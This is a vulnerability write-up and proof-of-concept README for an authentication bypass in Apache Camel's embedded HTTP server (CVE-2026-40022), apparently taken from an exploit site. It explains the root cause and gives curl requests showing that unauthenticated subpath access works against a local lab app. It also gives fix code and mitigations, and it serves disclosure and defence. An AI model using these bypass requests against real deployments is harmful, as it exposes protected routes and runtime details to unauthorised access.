## https://sploitus.com/exploit?id=F8620CC2-E28D-59F7-BB5D-0D40845BA5D8
# camel-platform-http-main Authentication Bypass on Non-Root Context Paths (CVE-2026-40022)
This project demonstrates an **authentication bypass** in Apache Camel's `camel-platform-http-main`
component (the embedded HTTP / management server of the Camel *main* runtime), tracked as
**CVE-2026-40022**. When authentication is enabled and a non-root context path (e.g. `/api` or
`/admin`) is configured, the authentication handler only covers the exact context path, so
unauthenticated requests to **subpaths** reach protected routes and management endpoints.
Advisory: https://camel.apache.org/security/CVE-2026-40022.html
## Vulnerability Summary
| Property | Value |
|----------|-------|
| **Component** | `camel-platform-http-main` (Camel main runtime embedded HTTP/management server) |
| **Affected Classes** | `BasicAuthenticationConfigurer`, `JWTAuthenticationConfigurer`, `MainAuthenticationConfigurer` |
| **Root cause** | When `authenticationPath` is unset it is derived from `camel.server.path`; with the Vert.x sub-router mounting model the auth handler matches only the exact context path, not its subpaths |
| **CWE** | CWE-287: Improper Authentication (authentication bypass) |
| **Impact** | Unauthenticated access to protected business routes and management endpoints (e.g. `/observe/info` runtime-metadata disclosure) |
| **Affected Versions** | From 4.14.1 before 4.14.6, and from 4.15.0 before 4.18.2 |
| **Fixed Versions** | 4.14.6, 4.18.2, 4.20.0 |
| **Reporter** | Jihang Yu |
| **PRs** | apache/camel#22474 (main), #22475 (4.18.x), #22476 (4.14.x) |
## Technical Details
`BasicAuthenticationConfigurer` (and `JWTAuthenticationConfigurer`) resolve the path the auth handler
protects from `properties.getAuthenticationPath()`, falling back to `properties.getPath()` (the
`camel.server.path` context path) when it is not explicitly set:
```java
String path = resolveAuthenticationPath(properties.getAuthenticationPath(), properties.getPath());
```
The Vert.x server mounts a **sub-router** at `*` and registers the auth handler *inside*
that sub-router at the resolved path. In affected versions the resolved path is the context path
itself, so โ relative to the sub-router already mounted at `/api` โ the auth handler ends up matching
`/api/api` rather than every subpath. As a result:
- `/api/api` **is** challenged (401) โ the handler is present, just mis-scoped
- `/api/hello` (the real business route) is **not** challenged โ served without credentials
The fix makes `resolveAuthenticationPath` return `/*`, so the handler covers all subpaths of the
sub-router.
## Setup
`application.properties` โ a non-root context path with auth enabled and `authenticationPath` unset:
```properties
camel.server.enabled = true
camel.server.port = 8080
camel.server.path = /api
camel.server.authenticationEnabled = true
camel.server.basicPropertiesFile = auth.properties
```
The route is served at `/api/hello`.
## Prerequisites
- Java 17+
- Maven 3.8+
No external service or Docker container is required โ the vulnerable HTTP server is the app itself.
## Reproduction Steps
### Step 1: Build and Start
```bash
mvn clean package -DskipTests
java -jar target/cve-2026-40022-platform-http-main-0.0.1-SNAPSHOT.jar
```
### Step 2: Show that authentication IS enabled
```bash
curl -i http://localhost:8080/api/api
# -> HTTP/1.1 401 Unauthorized
# WWW-Authenticate: Basic realm="vertx-web"
```
The BasicAuthHandler is active โ but mis-scoped to the exact context path.
### Step 3: The bypass โ reach the protected route without credentials
```bash
curl -i http://localhost:8080/api/hello
# -> HTTP/1.1 200 OK
# hello-response (this is a PROTECTED business route)
```
On a fixed version (4.14.6 / 4.18.2 / 4.20.0) this returns **401 Unauthorized**.
### Step 4: With credentials it also works (as intended)
```bash
curl -i -u camel:propertiesPass http://localhost:8080/api/hello
# -> HTTP/1.1 200 OK
```
## Impact: management endpoint disclosure
The same flaw applies to the management server (`camel.management.path`, e.g. `/admin`). An
unauthenticated request to a subpath such as `/admin/observe/info` reaches the management endpoint,
which can disclose runtime metadata: the OS user, working/home directory, process ID, JVM and OS
information.
## Exploit Conditions
1. The Camel **main** runtime with `camel-platform-http-main`.
2. Authentication enabled on the server or management server.
3. A **non-root** context path (`camel.server.path` / `camel.management.path`).
4. `camel.server.authenticationPath` / `camel.management.authenticationPath` **not** explicitly set.
## Recommended Fix
Upgrade to 4.14.6 / 4.18.2 / 4.20.0. The fix (`resolveAuthenticationPath`) makes the auth handler
cover every subpath:
```java
default String resolveAuthenticationPath(String authenticationPath, String contextPath) {
if (authenticationPath != null && !authenticationPath.isBlank()) {
return authenticationPath;
}
return "/*"; // was: the exact context path
}
```
## Mitigation
Until upgrading:
1. **Explicitly set** `camel.server.authenticationPath = /*` (and `camel.management.authenticationPath = /*`)
so the handler covers all subpaths.
2. Keep the management server on a trusted network only.
## Files
```
CVE-2026-40022/
โโโ pom.xml
โโโ README.md
โโโ src/main/
โโโ java/com/example/
โ โโโ Application.java # Camel main runtime entry point
โ โโโ HelloRoute.java # a protected platform-http route (/api/hello)
โโโ resources/
โโโ application.properties # non-root path + auth enabled (the vulnerable config)
โโโ auth.properties # basic-auth user (camel / propertiesPass)
```
## Disclaimer
This reproducer is provided for **security research and authorized testing only**, for a **publicly
disclosed and fixed** vulnerability. Do not use it against systems without explicit permission.